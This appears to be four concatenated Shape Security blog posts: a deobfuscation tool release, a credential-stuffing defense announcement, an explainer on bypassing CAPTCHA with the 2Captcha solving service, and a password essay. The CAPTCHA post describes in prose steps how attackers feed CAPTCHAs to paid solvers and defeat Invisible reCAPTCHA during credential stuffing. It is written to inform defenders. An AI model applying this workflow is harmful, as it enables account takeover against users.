Introducing Unminify

Shape Security is proud to announce the release of Unminify, our new open source tool for the automatic cleanup and deobfuscation of JavaScript.

Example

Given

function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

Unminify produces

function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Installation and usage

Unminify is a node.js module and is available on npm. It can be installed globally with npm install -g unminifyand then executed as unminify file.js, or executed without installation as npmx unminify file.js. It is also suitable for use as a library. For more, see the readme.

Unminify supports several levels of transformation, depending on how carefully the original semantics of the program need to be tracked. Some transformations can alter some or all behavior of the program under some circumstances; these are disabled by default.

Background

JavaScript differs from most programming languages in that it has no portable compiled form: the language which humans write is the same as the language which browsers download and execute.

In modern JavaScript development, however, there is still usually at least one compilation step. Experienced JavaScript developers are probably familiar with tools like UglifyJS, which are designed to transform JavaScript source files to minimize the amount of space they take while retaining their functionality, allowing humans to write code they can read without sending extraneous information like comments and whitespace to browsers. In addition, UglifyJS transforms the underlying structure (the abstract syntax tree, or AST) of the source code: for example, it rewrites if (a) { b(); c(); } to the equivalent a&&(b(),c()) anywhere such a construct occurs in the source. Code which has been processed by such tools is generally signicantly less readable; however, this is not necessarily a goal of UglifyJS and similar minifiers.

In other cases, the explicit goal is to obfuscate code (i.e., to render it difficult for humans and/or machines to analyze). In practice, most tools for this are not significantly more advanced than UglifyJS. Such tools generally operate by transforming the source code in one or more passes, each time applying a specific technique intended to obscure the program’s behavior. A careful human can effectively undo these by hand, given time propotional to the size of the program.

Simple examples

Suppose our original program is as follows:

function validate(input) {
  log(input);
  if (isValid(input)) {
    return 'ok';
  } else {
    return 'no';
  }
}

UglifyJS will turn this into

function validate(i){return log(i),isValid(i)?"ok":"no"}

and an obfuscation tool might further rewrite this to

function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

State of the art

There are well established tools like Prettier for formatting JavaScript source by the addition of whitespace and other non-semantic syntax which improves readability. These undo half of what a tool like UglifyJS does, but because they are intended for use by developers on their own code rather than for analysis of code produced elsewhere, they do not transform the underyling structure. Running Prettier on the above example gives

function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Other tools like JSTillery and JSNice do offer some amount of transformation of the structure of the code. However, in practice they tend to be quite limited. In our example above, JSTillery produces

function validate(i)
    /*Scope Closed:false | writes:false*/
    {
        return log(i), isValid(i) ? 'ok' : 'no';
    }

and JSNice produces

function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Unminify

Unminify is our contribution to this space. It can undo most of the transformations applied by UglifyJS and by simple obfuscation tools. On our example above, given the right options it will fully restore the original program except for the name of the local variable input, which is not recoverable:

function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Unminify is built on top of our open source Shift family of tools for the analysis and transformation of JavaScript.

Operation

The basic operation of Unminify consists of parsing the code to an AST, applying a series of transformations to that AST iteratively until no further changes are possible, and then generating JavaScript source from the final AST. These transformations are merely functions which consume a Shift AST and produce a Shift AST.
This processes is handled well by the Shift family, which makes it simple to write and, crucially, reason about analysis and transformation passes on JavaScript source. There is very little magic under the hood.

Unminify has support for adding additional transformation passes to its pipeline. These can be passed with the --additional-transform transform.js flag, where transform.js is a file exporting a transformation function. If you develop a transformation which is generally useful, we encourage you to contribute it!

Introducing Blackfish, a system to help eliminate the use of stolen passwords

Today we’re releasing Blackfish, a system that proactively protects companies from credential stuffing before an attack takes place. Normally, credential stuffing starts with a data breach at one major company (“Initial Victim”), and continues when a criminal then uses the stolen data (usernames and passwords) against dozens or even hundreds of different companies (“Downstream Victims”). Usually, many months or years pass before the Initial Victim realizes and discloses the initial data breach, and in that time, criminals are able to successfully attack huge numbers of Downstream Victims. Later, once the Initial Victim does disclose the breach, the Downstream Victims start matching the username/password pairs from the Initial Victim against their own user databases, and resetting any passwords that match. The whole process can take years and results in hundreds of millions of dollars worth of fraud and brand damage.

Blackfish changes all that. From the very first moment a criminal attempts to use stolen usernames and passwords, Blackfish begins monitoring and protecting matching accounts at other companies. So, while under normal circumstances a criminal can get hundreds of chances to monetize the stolen usernames and passwords, with Blackfish in place, criminals get far fewer chances.

You may be wondering how Blackfish can accomplish all this. Explaining that requires a little background on Shape Security.

We founded Shape six years ago to answer a simple question: is a visitor to a web or mobile app an actual human being? This simple question proved to be an important one. As we perfected our ability to answer it, we started eliminating enormous amounts of fraudulent traffic from the largest web and mobile apps in the world — often 90% or more of the login traffic from a Fortune 100 web application.

Today, we are the primary line of defense for many of the largest organizations around the world. Our customers include: three of the top four banks, three of the top five airlines, two of the top three hotel chains, and numerous other leading companies and government agencies.

We secure all of those large organizations in a centralized way, directly delivering the security outcome of eliminating fraudulent traffic. That centralized security capability is also the heart of Blackfish, and allows Blackfish to see stolen usernames and passwords in use far before anyone else ever knows about them (including the Initial Victim).

Think about it: if you were a criminal and managed to steal all the usernames and passwords from a major corporation, where would you try them out? If you’re like most criminals, the answer is that you’d try them on the largest banks, airlines, hotels, and retail sites in the world. That’s what happens in practice, and when it does, that’s also when Blackfish sees the very first such attack, and sets about protecting all username/password pairs that happen to match on other large websites.

Blackfish does all this before the original data breach is reported or even detected by the Initial Victim company.

The problem with looking for credentials on the dark web

You can scour the dark web to find user credentials, but one of the greatest dangers companies face today is the long window of time between when breaches occur on third-party websites like Yahoo, and when those breaches are discovered and announced. Instead of hoping that stolen passwords will appear in the dark web in time to be useful, Blackfish autonomously detects credential stuffing attacks on the largest, most targeted websites in the world, identifies newly stolen credentials, and nullifies them globally. That stolen data becomes useless to cybercriminals.

How does it work?

Shape has grown into one of the largest processors of login traffic on the entire web. We have built machine learning and deep learning systems to autonomously identify credential stuffing attacks in real-time. These systems now generate an important byproduct: direct knowledge of stolen usernames and passwords when criminals are first starting to exploit them against major web and mobile apps. What this means is that we see the stolen assets months or years before they appear on the dark web.

Blackfish’s knowledge base of compromised credentials is built with maximum security in mind. To ensure that its knowledge base is secured, Blackfish does not store any credential information but instead leverages Bloom filters to create probabilistic data structures to perform its operations. As a result, the compromised credentials themselves are not stored anywhere and Blackfish can use the information about compromises to improve security while maintaining full data privacy.

What good is a stolen password if you can never use it?

For better or for worse, memorized secrets (a.k.a. “passwords”) are the most widely used authentication mechanism online. As such, having access to millions of stolen passwords (over 3.3 billion were reported stolen in 2016 alone) allows cybercriminals to easily take over users’ accounts on any major website. They do this with credential stuffing attacks, which take stolen passwords from website A and try them on website B to see which accounts the same email addresses and passwords will unlock. Cybercriminals can do this reliably with a typical 1-2% success rate, allowing them to seize the value in bank accounts, gift card accounts, airline loyalty programs, and other accounts, which they can then monetize for a predictable ROI.

Since credential stuffing attacks are responsible for more than 99.9% of account takeover attempts, if we identify the stolen credentials that are used in these attacks, and invalidate them across other websites, we change the economics for cybercriminals significantly. If their 1-2% success rate now drops by two orders of magnitude or more, their “business” no longer functions. At that point, the cybercriminal has no choice but to try to obtain new stolen passwords. If those new passwords are similarly detected and invalidated, it will become clear to the criminals that the economics of their scheme have been broken. We think that over time, Blackfish will end credential stuffing for everyone.

We are all very excited at Shape to announce this system and our vision to make credential stuffing attacks a thing of the past. You can learn more on our website and contact us when your company is ready to try Blackfish.

How Cybercriminals Bypass CAPTCHA

One thing the world can consistently agree on is that CAPTCHAs are annoying. The puzzle always appears in the most inconvenient of places. Online gift card purchases. Creating an account on an ecommerce webpage. Typing in those hard to memorize credentials one too many times.

But the ultimate frustration about CAPTCHA is that it serves absolutely no purpose. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), was originally designed to prevent bots, malware, and artificial intelligence (AI) from interacting with a web page. In the 90s, this meant preventing spam bots. These days, organizations use CAPTCHA in an attempt to prevent more sinister automated attacks like credential stuffing.

Almost as soon as CAPTCHA was introduced, however, cybercriminals developed effective methods to bypass it. The good guys responded with “hardened” CAPTCHAs but the result remains the same: the test that attempts to stop automation is circumvented with automation.

There are multiple ways CAPTCHA can be defeated. A common method is to use a CAPTCHA solving service, which utilizes low-cost human labor in developing countries to solve CAPTCHA images. Cybercriminals subscribe to a service for CAPTCHA solutions, which streamline into their automation tools via APIs, populating the answers on the target website. These shady enterprises are so ubiquitous that many can be found with a quick Google search, including:

  • DeathbyCAPTCHA
  • 2Captcha
  • Kolotibablo
  • ProTypers
  • Antigate

This article will use 2Captcha to demonstrate how attackers integrate the solution to orchestrate credential stuffing attacks.

2Captcha

Upon accessing the site 2Captcha.com, the viewer is greeted with the image below, asking whether the visitor wants to 1) work for 2Captcha or 2) purchase 2Captcha as a service.

image5

Option 1 – Work for 2Captcha

To work for 2Captcha, simply register for an account, providing an email address and PayPal account for payment deposits. During a test, an account was validated within minutes.

New workers must take a one-time training course that teaches them how to quickly solve CAPTCHAs. It also provides tips such as when case does and doesn’t matter. After completing the training with sufficient accuracy, the worker can start earning money.

image4

After selecting “Start Work,” the worker is taken to the workspace screen, which is depicted above. The worker is then provided a CAPTCHA and prompted to submit a solution. Once solved correctly, money is deposited into an electronic “purse,” and the worker can request payout whenever they choose. There is seemingly no end to the number of CAPTCHAs that appear in the workspace, indicating a steady demand for the service.

2captcha_gif

2Captcha workers are incentivized to submit correct solutions much like an Uber driver is incentivized to provide excellent service—customer ratings. 2Captcha customers rate the accuracy of the CAPTCHA solutions they received. If a 2Captcha worker’s rating falls below a certain threshold, she will be kicked off the platform. Conversely, workers with the highest ratings will be rewarded during times of low demand by receiving priority in CAPTCHA distribution.

Option 2 – 2Captcha as a service

To use 2Captcha as a service, a customer (i.e., an attacker) integrates the 2Captcha API into her attack to create a digital supply chain, automatically feeding CAPTCHA puzzles from the target site and receiving solutions to input into the target site.

2Captcha helpfully provides example scripts to generate API calls in different programming languages, including C#, JavaScript, PHP, Python, and more. The example code written in Python has been reproduced below:

image2

Integrating 2CAPTCHA into an Automated Attack

How would an attacker use 2Captcha in a credential stuffing attack? The diagram below shows how the different entities interact in a CAPTCHA bypass process:

image3

Technical Process:

  1. Attacker requests the CAPTCHA iframe source and URL used to embed the CAPTCHA image from the target site and saves it locally
  2. Attacker requests API token from 2Captcha website
  3. Attacker sends the CAPTCHA to the 2Captcha service using HTTP POST and receives a Captcha ID, which is a numerical ID attributed with the CAPTCHA image that was submitted to 2Captcha. The ID is used in step 5 for an API GET request to 2Captcha to retrieve the solved CAPTCHA.
  4. 2Captcha assigns the CAPTCHA to a worker who then solves it and submits the solution to 2Captcha.
  5. Attacker programs script to ping 2Captcha using CAPTCHA ID (every 5 seconds until solved). 2Captcha then sends the solved CAPTCHA. If the solution is still being solved, the attacker receives a post from 2Captcha indicating “CAPTCHA_NOT_READY” and the program tries again 5 seconds later.
  6. Attacker sends a login request to the target site with the fields filled out (i.e. a set of credentials from a stolen list) along with the CAPTCHA solution.
  7. Attacker iterates over this process with each CAPTCHA image.

Combined with web testing frameworks like Selenium or PhantomJS, an attacker can appear to interact with the target website in a human-like fashion, effectively bypassing many existing security measures to launch a credential stuffing attack.

Monetization & Criminal Ecosystem

With such an elegant solution in place, what does the financial ecosystem look like, and how do the parties each make money?

Monetization: CAPTCHA solver

Working as a CAPTCHA solver is far from lucrative. Based on the metrics provided on 2Captcha’s website, it’s possible to calculate the following payout:

Assuming it takes 6 seconds per CAPTCHA, a worker can submit 10 CAPTCHAs per minute or 600 CAPTCHAs per hour. In an 8 hour day that’s 4800 CAPTCHAs. Based on what was earned during our trial as an employee for 2Captcha (roughly $0.0004 per solution), this equates to $1.92 per day.

This is a waste of time for individuals in developed countries, but for those who live in locales where a few dollars per day can go relatively far, CAPTCHA solving services are an easy way to make money.

Monetization: Attacker

The attacker pays the third party, 2Captcha, for CAPTCHA solutions in bundles of 1000. Attackers bid on the solutions, paying anywhere between $1 and $5 per bundle.

Many attackers use CAPTCHA-solving services as a component of a larger credential stuffing attack, which justifies the expense. For example, suppose an attacker is launching an attack to test one million credentials from Pastebin on a target site.  In this scenario, the attacker needs to bypass one CAPTCHA with each set of credentials, which would cost roughly $1000.  Assuming a 1.5% successful credential reuse rate, the attacker can take over 15,000 accounts, which can all be monetized.

Monetization: 2Captcha

2Captcha receives payment from the Attacker on a per 1000 CAPTCHA basis. As mentioned above, customers (i.e. attackers) pay between $1 and $5 per 1000 CAPTCHAs. Services like 2Captcha then take a cut of the bid price and dole out the rest to their human workforce. Since CAPTCHA solving services are used as a solution at scale, the profits add up nicely. Even if 2Captcha only receives $1 per 1000 CAPTCHAs solved, they net a minimum of 60 cents per bundle. The owners of these sites are often in developing countries themselves, so the seemingly low revenue is substantial.

What about Google’s Invisible reCAPTCHA?

In March of this year, Google released an upgraded version of its reCAPTCHA called “Invisible reCAPTCHA.” Unlike “no CAPTCHA reCAPTCHA,” which required all users to click the infamous “I’m not a Robot” button, Invisible reCAPTCHA allows known human users to pass through while only serving a reCAPTCHA image challenge to suspicious users.

You might think that this would stump attackers because they would not be able to see when they were being tested. Yet, just one day after Google introduced Invisible reCAPTCHA, 2CAPTCHA wrote a blog post on how to beat it.

The way Google knows a user is a human is if the user has previously visited the requested page, which Google determines by checking the browser’s cookies. If the same user started using a new device or recently cleared their cache, Google does not have that information and is forced to issue a reCAPTCHA challenge.

For an attacker to automate a credential stuffing attack using 2Captcha, he needs to guarantee a CAPTCHA challenge. Thus, one way to bypass Invisible reCAPTCHA is to add a line of code to the attack script that clears the browser with each request, guaranteeing a solvable reCAPTCHA challenge.

The slightly tricky thing about Invisible reCAPTCHA is that the CAPTCHA challenge is hidden, but there is a workaround. The CAPTCHA can be “found” by using the “inspect element” browser tool. So the attacker can send a POST to 2Captcha that includes a parameter detailing where the hidden CAPTCHA is located. Once the attacker receives the CAPTCHA solution from 2Captcha, Invisible reCAPTCHA can be defeated via automation in one of two ways:

  1. JavaScript action that calls a function to supply the solved token with the page form submit
  2. HTML code change directly in the webpage to substitute a snippet of normal CAPTCHA code with the solved token input.

The fact that Invisible reCAPTCHA can be bypassed isn’t because there was a fatal flaw in the design of the newer CAPTCHA. It’s that any reverse Turing test is inherently beatable when the pass conditions are known.

As long as there are CAPTCHAs, there will be services like 2Captcha because the economics play so well into the criminal’s hands. Taking advantage of low cost human labor minimizes the cost of doing business and allows cybercriminals to reap profits that can tick upwards of millions of dollars at scale. And there will always be regions of the world with cheap labor costs, so the constant demand ensures constant supply on 2Captcha’s side.

The world doesn’t need to develop a better CAPTCHA, since this entire approach has fundamental limitations. Instead, we should acknowledge those limitations and implement defenses where the pass conditions are unknown or are at least difficult for attackers to ascertain.

Sources

Holmes, Tamara E. “Prepaid Card and Gift Card Statistics.” CreditCards.com. Creditcards.com, 01 Dec. 2015. Web.

Hunt, Troy. “Breaking CAPTCHA with Automated Humans.” Blog post. Troy Hunt. Troy Hunt, 22 Jan. 2012. Web.

Motoyama, Marti, Kirill Levchenko, Chris Kanich, and Stefan Savage. Re: CAPTCHAs–Understanding CAPTCHA-solving Services in an Economic Context. Proc. of 19th USENIX Security Symposium, Washington DC. Print.

Learn More

Watch the video, “Learn How Cybercriminals Defeat CAPTCHA

World Kill the Password Day

This World Password Day, let’s examine why the world has not yet managed to kill the password.

Today is World Password Day. It’s also Star Wars Day, which will get far more attention from far more people (May the Fourth be with you). It also happens to be National Orange Juice Day. And a few other days. This confusion is appropriate for World Password Day, because while the occasion is about improving password habits, the world has turned decidedly against passwords. Headlines from the past few years demonstrate a consistent stream of invective toward them:

2013: “PayPal and Apple Want to Kill Your Password
2014: “Inside Twitter’s ambitious plan to kill the password
2015: “White House goal: Kill the password
2016: “Google aims to kill passwords by the end of this year
2017: “Facebook wants to kill the password

And yet, not one of these efforts has succeeded in “killing the password”—as we can see from the fact that every major online service still requires them.

Why is this the case? To explore this question, it is useful to first examine the function that passwords serve. Online applications must ensure that only authorized users are able to access their data or functionality. In order to do this, the application requires some form of proof that the user who is accessing the application is who they say they are. Passwords are a “shared secret” between the authorized user and the application, and if the user accessing the application demonstrates they know this secret, the application assumes that they are the authorized user. Unfortunately, unauthorized users may learn this shared secret, through various types of attacks, so passwords simply do not provide a good proof of identity. And yet, the password continues to be the universal method of online authentication.

So what about all of the technologies that have gained popularity in recent years, like two-factor authentication using mobile devices and fingerprint scanners? Let’s take a look at some of these alternatives and why they haven’t been able to replace passwords.

Standard biometrics, like fingerprint and iris-based authentication, are convenient in that you always have them available on your person, but you obviously cannot change them. Soft biometrics, like voice and typing pattern analysis, are similar convenient, but have too much variation to be used for anything but negative authentication. Hard and soft tokens, in the form of dedicated hardware or personal mobile devices, are inconvenient to access and often difficult to use. And finally, device-based authentication is also only suitable for negative authentication, since users use multiple devices or may lose their authorized device.

There are some common benefits and drawbacks of these approaches which start to appear. This is because every system for authentication fits into the well-known framework of:

1. Something you know (such as a password)
2. Something you have (such as a mobile phone)
3. Something you are (such as a fingerprint)

The problem is that each part of this framework has different strengths and weaknesses. “Something you know” is convenient and changeable, but it can also be stolen easily, especially if copied somewhere and stored insecurely. “Something you have” is harder to steal, but is also not always with you. And “Something you are” is always available to you, but the description of what you are (say, a scan of your iris) cannot be changed if stolen from an insecure service that stored it. What this means is that the only true replacement for passwords will come from a mechanism that offers the same benefits as “something you know”, and yet somehow addresses its drawbacks.

Security challenge questions: the worst second factor

Some systems have tried to use security challenge questions as an additional authentication factor, especially for password recovery, but these are one of the worst developments in online security. Their problem is that they combine the drawbacks of passwords (answers can be stolen through data breaches), with the drawbacks of biometrics (you can’t change your mother’s maiden name or the street where you grew up), and add their own unique drawbacks (answers can be guessed through social media). Most security professionals now enter random information into such security challenge questions, but that effectively creates additional passwords, which offer no benefit over a single, strong password, except for use as a backup password.

But there is a more fundamental conflict which underpins our continued reliance on passwords: the fact that security and convenience are usually at odds. Moving toward three-factor authentication (one factor from each category), using a combination of something like a password, a soft token, and biometrics, one can create a relatively secure authentication mechanism, but this is much less convenient for most users.

Users value convenience over security (yet still expect security)

For many years, the public has been learning of the need for everyone to select strong passwords. But most people still don’t. Recently, because of the Yahoo and other data breaches, the public started to learn that even if they select strong passwords, they should never reuse them across sites. But most people still do. Password managers aren’t silver bullets, and are subject to their own vulnerabilities, but their widespread use would dramatically improve both of the above issues. Unfortunately, most people don’t use them. Multi-factor authentication, specifically two-factor authentication using mobile phones, is now offered on most major online services. While everyone should enable it, most people won’t, due to the difficulty of use or the lack of convenience.

Security professionals and other security-conscious users are getting more and more options, but the average person continues to value convenience and ease of use above all else, and would like security to simply be provided for them automatically. They don’t want to have to take responsibility for preventing their online bank account from being hacked—they want the bank to take care of that.

In fact, since users will quickly abandon services that are too difficult to use, online services focus much more on improving usability than on security. This is illustrated by a step back in security that technology companies have taken over the years, by standardizing on the use of email addresses as usernames. In the past, you could set a unique username for each account, making it far more difficult for cybercriminals to gain access to your account on one service by stealing your credentials from another. But since remembering both usernames and passwords was hard for users, and online services needed users’ email addresses anyway, they have collectively chosen to consolidate the username and email address into a single identifier. This, of course, has fuelled credential stuffing attacks and automated fraud across all major online services, leveraging billions of spilled credentials through attack tools like Sentry MBA.

The future includes more passwords, for now

The reason that we still have passwords is because we as users continue to demand their advantages, and haven’t come up with anything that preserves those while addressing their drawbacks. Similar to Winston Churchill’s observation on democracy, we might say that passwords are the worst form of authentication—except for all the others that have been tried.

While users are becoming more security conscious, and are learning to accept the friction of multi-factor authentication for the benefit of security, a sea change in user behavior isn’t happening anytime soon. This shifts the burden for security and fraud protection back to online service providers. Given the constraint of delivering a friction-free experience to their users, they are now investing in layered, invisible security mechanisms. These mechanisms allow them to provide the benefits of passwords with defense against their drawbacks, by doing things such as detecting when stolen passwords are used (as recommended by NIST) or protecting against credential stuffing attacks.

It’s World Password Day. While technologies like Apple’s Touch ID afford us great conveniences, and may eventually result in many people being able to bypass re-entering their passwords much of the time, they do not replace those passwords. We’re not “killing” the password anytime soon, so this May 4th, let’s make sure we continue to promote good password practices.